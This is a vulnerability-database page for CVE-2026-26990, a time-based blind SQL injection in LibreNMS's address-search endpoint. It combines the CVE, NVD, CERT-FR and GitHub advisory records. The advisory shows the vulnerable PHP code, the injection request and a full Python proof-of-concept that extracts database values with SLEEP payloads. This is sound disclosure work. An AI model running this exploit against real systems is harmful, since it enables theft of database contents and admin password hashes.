CVE-2026-26990 (GCVE-0-2026-26990)
Vulnerability from cvelistv5 – Published: 2026-02-20 01:29 – Updated: 2026-02-20 15:34
VLAI?
Title
LibreNMS has Time-Based Blind SQL Injection in address-search.inc.php
Summary
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0.
Severity ?
8.8 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-26990",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-20T15:29:14.167811Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-20T15:34:46.036Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "librenms",
"vendor": "librenms",
"versions": [
{
"status": "affected",
"version": "\u003c 26.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-20T01:29:33.838Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92"
},
{
"name": "https://github.com/librenms/librenms/pull/18777",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/librenms/librenms/pull/18777"
},
{
"name": "https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1"
}
],
"source": {
"advisory": "GHSA-79q9-wc6p-cf92",
"discovery": "UNKNOWN"
},
"title": "LibreNMS has Time-Based Blind SQL Injection in address-search.inc.php"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-26990",
"datePublished": "2026-02-20T01:29:33.838Z",
"dateReserved": "2026-02-17T01:41:24.606Z",
"dateUpdated": "2026-02-20T15:34:46.036Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-26990\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-20T02:16:54.870\",\"lastModified\":\"2026-02-20T16:24:36.787\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"26.2.0\",\"matchCriteriaId\":\"C0838E1C-0369-4B31-9B51-83A5D2A7CAC9\"}]}]}],\"references\":[{\"url\":\"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/librenms/librenms/pull/18777\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-26990\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-20T15:29:14.167811Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-20T15:29:16.003Z\"}}], \"cna\": {\"title\": \"LibreNMS has Time-Based Blind SQL Injection in address-search.inc.php\", \"source\": {\"advisory\": \"GHSA-79q9-wc6p-cf92\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92\", \"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/librenms/librenms/pull/18777\", \"name\": \"https://github.com/librenms/librenms/pull/18777\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1\", \"name\": \"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-20T01:29:33.838Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-26990\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-20T15:34:46.036Z\", \"dateReserved\": \"2026-02-17T01:41:24.606Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-20T01:29:33.838Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-26990
Vulnerability from fkie_nvd - Published: 2026-02-20 02:16 - Updated: 2026-02-20 16:24
Severity ?
Summary
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C0838E1C-0369-4B31-9B51-83A5D2A7CAC9",
"versionEndExcluding": "26.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixedd in version 26.2.0."
}
],
"id": "CVE-2026-26990",
"lastModified": "2026-02-20T16:24:36.787",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-20T02:16:54.870",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/librenms/librenms/pull/18777"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
CERTFR-2026-AVI-0174
Vulnerability from certfr_avis - Published: 2026-02-17 - Updated: 2026-02-17
De multiples vulnérabilités ont été découvertes dans LibreNMS. Elles permettent à un attaquant de provoquer une injection SQL (SQLi) et une injection de code indirecte à distance (XSS).
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "LibreNMS versions ant\u00e9rieures \u00e0 26.2.0",
"product": {
"name": "LibreNMS",
"vendor": {
"name": "LibreNMS",
"scada": false
}
}
},
{
"description": "LibreNMS versions post\u00e9rieures \u00e0 24.10.0 et ant\u00e9rieures \u00e0 26.2.0 pour composer",
"product": {
"name": "LibreNMS",
"vendor": {
"name": "LibreNMS",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-26988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26988"
},
{
"name": "CVE-2026-26990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26990"
},
{
"name": "CVE-2026-26989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26989"
},
{
"name": "CVE-2026-26987",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26987"
}
],
"initial_release_date": "2026-02-17T00:00:00",
"last_revision_date": "2026-02-17T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0174",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-17T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans LibreNMS. Elles permettent \u00e0 un attaquant de provoquer une injection SQL (SQLi) et une injection de code indirecte \u00e0 distance (XSS).",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans LibreNMS",
"vendor_advisories": [
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-79q9-wc6p-cf92",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-fqx6-693c-f55g",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-fqx6-693c-f55g"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-h3rv-q4rq-pqcv",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-93fx-g747-695x",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-5pqf-54qp-32wx",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-6xmx-xr9p-58p7",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7"
},
{
"published_at": "2026-02-17",
"title": "Bulletin de s\u00e9curit\u00e9 LibreNMS GHSA-gqx7-99jw-6fpr",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr"
}
]
}
GHSA-79Q9-WC6P-CF92
Vulnerability from github – Published: 2026-02-18 22:31 – Updated: 2026-02-18 22:31
VLAI?
Summary
LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php
Details
Summary
A time-based blind SQL injection vulnerability exists in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.
Details
This vulnerability requires authentication and is exploitable by any authenticated user.
The vulnerable endpoint is at /ajax_table.php with the following request displaying the injection point.
POST /ajax_table.php HTTP/1.1
Host: 192.168.236.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.236.131
Connection: keep-alive
Referer: http://192.168.236.131/search
Cookie: laravel_session=[Authenticated user cookie]
current=1&rowCount=55&sort%5Bhostname%5D=asc&searchPhrase=&id=address-search&search_type=ipv4&device_id=1&interface=&address=127.0.0.1/aa<injected SQL here>
Within includes/html/table/address-search.inc.php, the user-controlled $prefix variable derived from the address parameter is concatenated directly into the SQL query without sanitization or parameter binding on lines 34 and 52.
// Lines 16-35, 51-53
$address = $vars['address'] ?? '';
$prefix = '';
$sort = trim((string) $sort);
if (str_contains($address, '/')) {
[$address, $prefix] = explode('/', $address, 2);
}
if ($search_type == 'ipv4') {
$sql = ' FROM `ipv4_addresses` AS A, `ports` AS I, `devices` AS D';
$sql .= ' WHERE I.port_id = A.port_id AND I.device_id = D.device_id ' . $where . ' ';
if (! empty($address)) {
$sql .= ' AND ipv4_address LIKE ?';
$param[] = "%$address%";
}
if (! empty($prefix)) {
$sql .= " AND ipv4_prefixlen='$prefix'";
}
......
if (! empty($prefix)) {
$sql .= " AND ipv6_prefixlen = '$prefix'";
}
PoC
The following Python script exploits the time-based blind SQL injection vulnerability to retrieve the value of SELECT CURRENT_USER() from the database:
#!/usr/bin/python3
import requests
import sys
import re
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Configured to be used with burpsuite on the default burpsuite port of 8080
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# When None is returned it means that all values have been retrieved from the queried value in the target DB
def blind_binsearch_sqli(inj_str):
try:
a = range(32,126)
start = 0
end = len(a)
while start <= end:
mid = (start + end) // 2
target_equal = inj_str.replace("[CHAR]", str(a[mid]))
target_less = inj_str.replace("=[CHAR]", f"<{a[mid]}")
# Return ascii decimal value for storing to a local string buffer
if condition(target_equal):
return a[mid]
# Use lower half of the "a" array
elif condition(target_less):
end = mid - 1
# Use upper half of the "a" array
else:
start = mid + 1
return None
except IndexError:
return None
# Check injection result
def condition(payload):
exploit_data = {
"current": "1",
"rowCount": "50",
"sort[hostname]": "asc",
"searchPhrase": "",
"id": "address-search",
"search_type": "ipv4",
"device_id": "1",
"interface": "",
"address": f"127.0.0.1/aa{payload}"
}
# Payload must be slotted in somewhere in this code
payload_url = f"{url}/ajax_table.php"
r = s.post(payload_url, data=exploit_data)
elapsed_time_seconds = r.elapsed.total_seconds()
# If response time is within sleep function delay range of +1 or -1 second the query returned "true"
if (elapsed_time_seconds + 1) > (sleep_delay * 2) and (elapsed_time_seconds - 1) < (sleep_delay * 2):
return True
else:
return False
def get_length(inj):
length = 0
print(f"(+) Getting the length of \"{inj}\"")
while True:
# MySQL
#length_injection_string = f" AND LENGTH(({inj}))={str(length)}-- -"
length_injection_string = f"' AND (SELECT 1 FROM (SELECT IF(LENGTH(({inj}))={str(length)},SLEEP({sleep_delay}),0))x) AND '1'='1"
bool_value = condition(length_injection_string)
if bool_value == False:
length += 1
else:
return length
def injection(inject_qry):
extracted = ""
length = get_length(inject_qry)
print(f"Length of \"{inject_qry}\": {length}")
print(f"(+) Retrieving the value for \"{inject_qry}\"")
# +2 to length in order to automatically stop the injection once the None value is returned, meaning that the whole query value is extracted
for i in range(1, length + 2):
# MySQL
injection_string = f"' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(({inject_qry}),{i},1))=[CHAR],SLEEP({sleep_delay}),0))x) AND '1'='1"
retrieved_value = blind_binsearch_sqli(injection_string)
if retrieved_value:
extracted += chr(retrieved_value)
extracted_char = chr(retrieved_value)
print(extracted_char, flush=True, end="")
elif retrieved_value == None:
print("\n(+) done!\n")
return extracted
global url
global s
global sleep_delay
global username
global password
# Default sleep delay, due to injection query used the response time will be sleep_delay * 2
sleep_delay = 1.5
s = requests.Session()
# HTTPS
s.verify = False
# Toggle debug proxy
#s.proxies.update(proxies)
url = "http://192.168.236.131"
username = "tester2"
password = "Adminbazinga"
if len(sys.argv) > 1:
url = sys.argv[1]
if len(sys.argv) > 2:
username = sys.argv[2]
if len(sys.argv) > 3:
password = sys.argv[3]
if len(sys.argv) > 4:
sleep_delay = float(sys.argv[4])
r = s.get(url + "/login")
login_token = re.search(r"name=\"_token\"\s+value=\"([^\"]+)\"", r.text).group(1)
login_data = {
"_token": login_token,
"username": username,
"password": password,
"submit": ""
}
r = s.post(url + "/login", data=login_data)
# Example: python3 script.py http://127.0.0.1 username password 1.5
if __name__ == "__main__":
injection("SELECT CURRENT_USER()")
Tester user role:
Example usage of PoC script:
Impact
- Any authenticated user can exploit this vulnerability to extract sensitive information from the back-end database using time‑based blind SQL injection techniques.
- This leads to unauthorised disclosure of database contents, including schema information and potentially sensitive application data.
- An attacker can retrieve privileged accounts (e.g. administrative usernames) and their associated password hashes, potentially leading to privilege escalation within LibreNMS by cracking the password hashes and obtaining plaintext admin user credentials.
Severity ?
8.8 (High)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "librenms/librenms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26990"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:31:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nA time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.\n\n\n### Details\nThis vulnerability requires authentication and is exploitable by any authenticated user.\n\nThe vulnerable endpoint is at `/ajax_table.php` with the following request displaying the injection point.\n```\nPOST /ajax_table.php HTTP/1.1\nHost: 192.168.236.131\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: http://192.168.236.131\nConnection: keep-alive\nReferer: http://192.168.236.131/search\nCookie: laravel_session=[Authenticated user cookie]\n\ncurrent=1\u0026rowCount=55\u0026sort%5Bhostname%5D=asc\u0026searchPhrase=\u0026id=address-search\u0026search_type=ipv4\u0026device_id=1\u0026interface=\u0026address=127.0.0.1/aa\u003cinjected SQL here\u003e\n```\n\nWithin `includes/html/table/address-search.inc.php`, the user-controlled `$prefix` variable derived from the `address` parameter is concatenated directly into the SQL query without sanitization or parameter binding on lines 34 and 52.\n\n```php\n// Lines 16-35, 51-53\n$address = $vars[\u0027address\u0027] ?? \u0027\u0027;\n$prefix = \u0027\u0027;\n$sort = trim((string) $sort);\n\nif (str_contains($address, \u0027/\u0027)) {\n [$address, $prefix] = explode(\u0027/\u0027, $address, 2);\n}\n\nif ($search_type == \u0027ipv4\u0027) {\n $sql = \u0027 FROM `ipv4_addresses` AS A, `ports` AS I, `devices` AS D\u0027;\n $sql .= \u0027 WHERE I.port_id = A.port_id AND I.device_id = D.device_id \u0027 . $where . \u0027 \u0027;\n\n if (! empty($address)) {\n $sql .= \u0027 AND ipv4_address LIKE ?\u0027;\n $param[] = \"%$address%\";\n }\n\n if (! empty($prefix)) {\n $sql .= \" AND ipv4_prefixlen=\u0027$prefix\u0027\";\n }\n\n......\n\n if (! empty($prefix)) {\n $sql .= \" AND ipv6_prefixlen = \u0027$prefix\u0027\";\n }\n```\n\n\n### PoC\nThe following Python script exploits the time-based blind SQL injection vulnerability to retrieve the value of `SELECT CURRENT_USER()` from the database:\n```python\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport re\n\nfrom urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n# Configured to be used with burpsuite on the default burpsuite port of 8080\nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"}\n\n# When None is returned it means that all values have been retrieved from the queried value in the target DB\ndef blind_binsearch_sqli(inj_str):\n try:\n a = range(32,126)\n start = 0\n end = len(a)\n while start \u003c= end:\n mid = (start + end) // 2\n target_equal = inj_str.replace(\"[CHAR]\", str(a[mid]))\n target_less = inj_str.replace(\"=[CHAR]\", f\"\u003c{a[mid]}\")\n\n # Return ascii decimal value for storing to a local string buffer\n if condition(target_equal):\n return a[mid]\n # Use lower half of the \"a\" array\n elif condition(target_less):\n end = mid - 1\n # Use upper half of the \"a\" array\n else:\n start = mid + 1\n return None\n except IndexError:\n return None\n\n\n# Check injection result\ndef condition(payload):\n exploit_data = {\n \"current\": \"1\",\n \"rowCount\": \"50\",\n \"sort[hostname]\": \"asc\",\n \"searchPhrase\": \"\",\n \"id\": \"address-search\",\n \"search_type\": \"ipv4\",\n \"device_id\": \"1\",\n \"interface\": \"\",\n \"address\": f\"127.0.0.1/aa{payload}\"\n }\n # Payload must be slotted in somewhere in this code\n payload_url = f\"{url}/ajax_table.php\"\n\n r = s.post(payload_url, data=exploit_data)\n\n elapsed_time_seconds = r.elapsed.total_seconds()\n\n # If response time is within sleep function delay range of +1 or -1 second the query returned \"true\"\n if (elapsed_time_seconds + 1) \u003e (sleep_delay * 2) and (elapsed_time_seconds - 1) \u003c (sleep_delay * 2):\n return True\n else:\n return False\n\n\ndef get_length(inj):\n length = 0\n print(f\"(+) Getting the length of \\\"{inj}\\\"\")\n while True:\n # MySQL\n #length_injection_string = f\" AND LENGTH(({inj}))={str(length)}-- -\"\n length_injection_string = f\"\u0027 AND (SELECT 1 FROM (SELECT IF(LENGTH(({inj}))={str(length)},SLEEP({sleep_delay}),0))x) AND \u00271\u0027=\u00271\"\n\n bool_value = condition(length_injection_string)\n\n if bool_value == False:\n length += 1\n else:\n return length\n\n\ndef injection(inject_qry):\n extracted = \"\"\n length = get_length(inject_qry)\n print(f\"Length of \\\"{inject_qry}\\\": {length}\")\n print(f\"(+) Retrieving the value for \\\"{inject_qry}\\\"\")\n\n # +2 to length in order to automatically stop the injection once the None value is returned, meaning that the whole query value is extracted\n for i in range(1, length + 2):\n # MySQL\n injection_string = f\"\u0027 AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(({inject_qry}),{i},1))=[CHAR],SLEEP({sleep_delay}),0))x) AND \u00271\u0027=\u00271\"\n\n retrieved_value = blind_binsearch_sqli(injection_string)\n\n if retrieved_value:\n extracted += chr(retrieved_value)\n extracted_char = chr(retrieved_value)\n print(extracted_char, flush=True, end=\"\")\n elif retrieved_value == None:\n print(\"\\n(+) done!\\n\")\n return extracted\n\nglobal url\nglobal s\nglobal sleep_delay\nglobal username\nglobal password\n\n# Default sleep delay, due to injection query used the response time will be sleep_delay * 2\nsleep_delay = 1.5\n\ns = requests.Session()\n\n# HTTPS\ns.verify = False\n\n# Toggle debug proxy\n#s.proxies.update(proxies)\n\nurl = \"http://192.168.236.131\"\n\nusername = \"tester2\"\npassword = \"Adminbazinga\"\n\nif len(sys.argv) \u003e 1:\n url = sys.argv[1]\nif len(sys.argv) \u003e 2:\n username = sys.argv[2]\nif len(sys.argv) \u003e 3:\n password = sys.argv[3]\nif len(sys.argv) \u003e 4:\n sleep_delay = float(sys.argv[4])\n\nr = s.get(url + \"/login\")\n\nlogin_token = re.search(r\"name=\\\"_token\\\"\\s+value=\\\"([^\\\"]+)\\\"\", r.text).group(1)\n\nlogin_data = {\n\"_token\": login_token,\n\"username\": username,\n\"password\": password,\n\"submit\": \"\"\n}\n\nr = s.post(url + \"/login\", data=login_data)\n\n# Example: python3 script.py http://127.0.0.1 username password 1.5\nif __name__ == \"__main__\":\n injection(\"SELECT CURRENT_USER()\")\n```\n\nTester user role:\n\u003cimg width=\"771\" height=\"154\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fe13754c-9a41-48cb-934d-575097675c13\" /\u003e\n\n\nExample usage of PoC script:\n\u003cimg width=\"924\" height=\"104\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6b1e19a9-4c73-4e44-8e16-851ff92d5960\" /\u003e\n\n\n### Impact\n* Any authenticated user can exploit this vulnerability to extract sensitive information from the back-end database using time\u2011based blind SQL injection techniques.\n* This leads to unauthorised disclosure of database contents, including schema information and potentially 